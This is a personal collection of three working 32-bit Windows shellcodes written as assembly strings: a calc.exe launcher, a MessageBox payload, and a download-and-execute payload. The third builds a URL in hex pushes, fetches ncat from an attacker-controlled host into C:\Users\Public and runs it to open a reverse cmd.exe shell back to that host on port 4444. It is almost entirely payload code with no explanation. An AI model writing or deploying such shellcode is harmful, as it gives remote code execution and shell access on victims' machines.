My Custom shellcode database
~ ABX
:::[ CONTENTS ]:::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
@ Shellcode Type: WinExec shellcode (calc.exe)
@ Shellcode Type: MessageBox shellcode
@ Shellcode Type: URLDownloadToFileA + WinExec shellcode
###########################################################################
@ Shellcode Type: WinExec shellcode (calc.exe)
# Payload Size: 208 bytes
# OS: Windows 10 (32bit)
# Author: ABX
###########################################################################
" start: "
" mov ebp, esp ;"
" add esp, 0xfffff9f0 ;"
" find_kernel32: "
" xor ecx, ecx ;"
" mov esi,fs:[ecx+0x30] ;"
" mov esi,[esi+0x0C] ;"
" mov esi,[esi+0x1C] ;"
" next_module: "
" mov ebx, [esi+0x08] ;"
" mov edi, [esi+0x20] ;"
" mov esi, [esi] ;"
" cmp [edi+12*2], cx ;"
" jne next_module ;"
" find_function_shorten: "
" jmp find_function_shorten_bnc ;"
" find_function_ret: "
" pop esi ;"
" mov [ebp+0x04], esi ;"
" jmp resolve_symbols_kernel32 ;"
" find_function_shorten_bnc: "
" call find_function_ret ;"
" find_function: "
" pushad ;"
" mov eax, [ebx+0x3c] ;"
" mov edi, [ebx+eax+0x78] ;"
" add edi, ebx ;"
" mov ecx, [edi+0x18] ;"
" mov eax, [edi+0x20] ;"
" add eax, ebx ;"
" mov [ebp-4], eax ;"
" find_function_loop: "
" jecxz find_function_finished ;"
" dec ecx ;"
" mov eax, [ebp-4] ;"
" mov esi, [eax+ecx*4] ;"
" add esi, ebx ;"
" compute_hash: "
" xor eax, eax ;"
" cdq ;"
" cld ;"
" compute_hash_again: "
" lodsb ;"
" test al, al ;"
" jz compute_hash_finished ;"
" ror edx, 0x0d ;"
" add edx, eax ;"
" jmp compute_hash_again ;"
" compute_hash_finished: "
" find_function_compare: "
" cmp edx, [esp+0x24] ;"
" jnz find_function_loop ;"
" mov edx, [edi+0x24] ;"
" add edx, ebx ;"
" mov cx, [edx+2*ecx] ;"
" mov edx, [edi+0x1c] ;"
" add edx, ebx ;"
" mov eax, [edx+4*ecx] ;"
" add eax, ebx ;"
" mov [esp+0x1c], eax ;"
" find_function_finished: "
" popad ;"
" ret ;"
" resolve_symbols_kernel32: "
" push 0x78b5b983 ;"
" call dword ptr [ebp+0x04] ;"
" mov [ebp+0x10], eax ;"
" push 0xec0e4e8e ;"
" call dword ptr [ebp+0x04] ;"
" mov [ebp+0x14], eax ;"
" push 0x16b3fe72 ;"
" call dword ptr [ebp+0x04] ;"
" mov [ebp+0x18], eax ;"
" push 0xe8afe98 ;"
" call dword ptr [ebp+0x04] ;"
" mov [ebp+0x1c], eax ;"
" create_cmd_string: "
" xor eax, eax; "
" push eax; "
" mov eax, 0x9a879ad2 ;"
" neg eax ;"
" push eax ;"
" push 0x636c6163 ;"
" push esp ;"
" pop ebx ;"
" call_winexec: ;"
" mov eax, 0xfffffffb ; "
" neg eax ; "
" push eax ; "
" push ebx ; "
# "int3;"
"call dword ptr [ebp+0x1c] ;"
" exit: "
" xor eax, eax ;"
" push eax ;"
" push 0xffffffff ;"
" call dword ptr [ebp+0x10] ;"
###########################################################################
@ Shellcode Type: MessageBox shellcode
# Payload Size: 261 bytes
# OS: Windows 10 (32bit)
# Author: ABX
###########################################################################
" start: "
" mov ebp, esp ;"
" add esp, 0xfffff9f0 ;"
" find_kernel32: "
" xor ecx, ecx ;"
" mov esi,fs:[ecx+0x30] ;"
" mov esi,[esi+0x0C] ;"
" mov esi,[esi+0x1C] ;"
" next_module: "
" mov ebx, [esi+0x08] ;"
" mov edi, [esi+0x20] ;"
" mov esi, [esi] ;"
" cmp [edi+12*2], cx ;"
" jne next_module ;"
" find_function_shorten: "
" jmp find_function_shorten_bnc ;"
" find_function_ret: "
" pop esi ;"
" mov [ebp+0x04], esi ;"
" jmp resolve_symbols_kernel32 ;"
" find_function_shorten_bnc: "
" call find_function_ret ;"
" find_function: "
" pushad ;"
" mov eax, [ebx+0x3c] ;"
" mov edi, [ebx+eax+0x78] ;"
" add edi, ebx ;"
" mov ecx, [edi+0x18] ;"
" mov eax, [edi+0x20] ;"
" add eax, ebx ;"
" mov [ebp-4], eax ;"
" find_function_loop: "
" jecxz find_function_finished ;"
" dec ecx ;"
" mov eax, [ebp-4] ;"
" mov esi, [eax+ecx*4] ;"
" add esi, ebx ;"
" compute_hash: "
" xor eax, eax ;"
" cdq ;"
" cld ;"
" compute_hash_again: "
" lodsb ;"
" test al, al ;"
" jz compute_hash_finished ;"
" ror edx, 0x0d ;"
" add edx, eax ;"
" jmp compute_hash_again ;"
" compute_hash_finished: "
" find_function_compare: "
" cmp edx, [esp+0x24] ;"
" jnz find_function_loop ;"
" mov edx, [edi+0x24] ;"
" add edx, ebx ;"
" mov cx, [edx+2*ecx] ;"
" mov edx, [edi+0x1c] ;"
" add edx, ebx ;"
" mov eax, [edx+4*ecx] ;"
" add eax, ebx ;"
" mov [esp+0x1c], eax ;"
" find_function_finished: "
" popad ;"
" ret ;"
" resolve_symbols_kernel32: "
" push 0x78b5b983 ;"
" call dword ptr [ebp+0x04] ;"
" mov [ebp+0x10], eax ;"
" push 0xec0e4e8e ;"
" call dword ptr [ebp+0x04] ;"
" mov [ebp+0x14], eax ;"
" load_user32: "
" xor eax, eax ;"
" mov ax, 0x6c6c ;"
" push eax ;"
" push 0x642e3233 ;"
" push 0x72657375 ;"
" push esp ;"
" call dword ptr [ebp+0x14] ;"
" resolve_symbols_user32: "
" mov ebx, eax ;"
" push 0xbc4da2a8 ;"
" call dword ptr [ebp+0x04] ;"
" mov [ebp+0x18], eax ;"
" create_lpText_string: "
" xor eax, eax; "
" push eax; "
" push 0x6e6f6974 ;"
" push 0x61636966 ;"
" push 0x69746f4e ;"
" push esp ;"
" pop ebx ;"
" create_lpCaption_string: "
" xor eax, eax; "
" push eax; "
" push 0x21646574 ;"
" push 0x75636578 ;"
" push 0x4520786f ;"
" push 0x42656761 ;"
" push 0x7373654d ;"
" push 0x2064616f ;"
" push 0x6c796150 ;"
" push esp ;"
" pop esi ;"
" create_MB_OK_string: "
" xor eax, eax; "
" call_MessageBoxA: "
" xor eax, eax; "
" push eax ; "
" push ebx ; "
" push esi ; "
" push eax ; "
"int3;"
"call dword ptr [ebp+0x18] ;"
" exit: "
" xor eax, eax ;"
" push eax ;"
" push 0xffffffff ;"
" call dword ptr [ebp+0x10] ;"
###########################################################################
@ Shellcode Type: URLDownloadToFileA + WinExec shellcode
# Payload Size: 407 bytes
# OS: Windows 10 (32bit)
# Author: ABX
###########################################################################
" start: "
" mov ebp, esp ;"
" add esp, 0xfffff9f0 ;"
" find_kernel32: "
" xor ecx, ecx ;"
" mov esi,fs:[ecx+0x30] ;"
" mov esi,[esi+0x0C] ;"
" mov esi,[esi+0x1C] ;"
" next_module: "
" mov ebx, [esi+0x08] ;"
" mov edi, [esi+0x20] ;"
" mov esi, [esi] ;"
" cmp [edi+12*2], cx ;"
" jne next_module ;"
" find_function_shorten: "
" jmp find_function_shorten_bnc ;"
" find_function_ret: "
" pop esi ;"
" mov [ebp+0x04], esi ;"
" jmp resolve_symbols_kernel32 ;"
" find_function_shorten_bnc: "
" call find_function_ret ;"
" find_function: "
" pushad ;"
" mov eax, [ebx+0x3c] ;"
" mov edi, [ebx+eax+0x78] ;"
" add edi, ebx ;"
" mov ecx, [edi+0x18] ;"
" mov eax, [edi+0x20] ;"
" add eax, ebx ;"
" mov [ebp-4], eax ;"
" find_function_loop: "
" jecxz find_function_finished ;"
" dec ecx ;"
" mov eax, [ebp-4] ;"
" mov esi, [eax+ecx*4] ;"
" add esi, ebx ;"
" compute_hash: "
" xor eax, eax ;"
" cdq ;"
" cld ;"
" compute_hash_again: "
" lodsb ;"
" test al, al ;"
" jz compute_hash_finished ;"
" ror edx, 0x0d ;"
" add edx, eax ;"
" jmp compute_hash_again ;"
" compute_hash_finished: "
" find_function_compare: "
" cmp edx, [esp+0x24] ;"
" jnz find_function_loop ;"
" mov edx, [edi+0x24] ;"
" add edx, ebx ;"
" mov cx, [edx+2*ecx] ;"
" mov edx, [edi+0x1c] ;"
" add edx, ebx ;"
" mov eax, [edx+4*ecx] ;"
" add eax, ebx ;"
" mov [esp+0x1c], eax ;"
" find_function_finished: "
" popad ;"
" ret ;"
" resolve_symbols_kernel32: "
" push 0x78b5b983 ;"
" call dword ptr [ebp+0x04] ;"
" mov [ebp+0x10], eax ;"
" push 0xec0e4e8e ;"
" call dword ptr [ebp+0x04] ;"
" mov [ebp+0x14], eax ;"
" push 0xe8afe98 ;"
" call dword ptr [ebp+0x04] ;"
" mov [ebp+0x1c], eax ;"
" load_Urlmon: "
" xor eax, eax ;"
" mov ax, 0x6c6c ;"
" push eax ;"
" push 0x642e6e6f ;"
" push 0x6d6c7255 ;"
" push esp ;"
" call dword ptr [ebp+0x14] ;"
" resolve_symbols_URLDownloadToFile: "
" mov ebx, eax ;"
" push 0x702f1a36 ;"
" call dword ptr [ebp+0x04] ;"
" mov [ebp+0x18], eax ;"
" create_szURL_string: "
" xor eax, eax; "
" push eax; "
"push 0x6578652e ; "
"push 0x6c616e69 ; "
"push 0x6769726f ; "
"push 0x2d746163 ; "
"push 0x6e2f3038 ; "
"push 0x30383a36 ; "
"push 0x33322e35 ; "
"push 0x342e3836 ; "
"push 0x312e3239 ; "
"push 0x312f2f3a ; "
"push 0x70747468 ; "
" push esp ;"
" pop esi ;"
" create_szFileName_string: "
" xor eax, eax; "
" push eax; "
"push 0x6578652e ; "
"push 0x7461636e ; "
"push 0x5c63696c ; "
"push 0x6275505c ; "
"push 0x73726573 ; "
"push 0x555c3a43 ; "
" push esp ;"
" pop ebx ;"
" call_URLDownloadToFile: "
" xor eax, eax; "
" push eax ; "
" push eax ; "
" push ebx ; "
" push esi ; "
" push eax ; "
"call dword ptr [ebp+0x18] ;"
" create_cmd_string: "
"push 0x00006578 ; "
"push 0x652e646d ; "
"push 0x6320652d ; "
"push 0x20343434 ; "
"push 0x34203633 ; "
"push 0x322e3534 ; "
"push 0x2e383631 ; "
"push 0x2e323931 ; "
"push 0x20657865 ; "
"push 0x2e746163 ; "
"push 0x6e5c6369 ; "
"push 0x6c627550 ; "
"push 0x5c737265 ; "
"push 0x73555c3a ; "
"push 0x4320632f ; "
"push 0x20657865 ; "
"push 0x2e646d63 ; "
" push esp ;"
" pop ebx ;"
" mov ebx, esp ;"
" call_winexec: ;"
" mov eax, 0xfffffffb ; "
" neg eax ; "
" push eax ; "
" push ebx ; "
"call dword ptr [ebp+0x1c] ;"
" exit: "
" xor eax, eax ;"
" push eax ;"
" push 0xffffffff ;"
" call dword ptr [ebp+0x10] ;"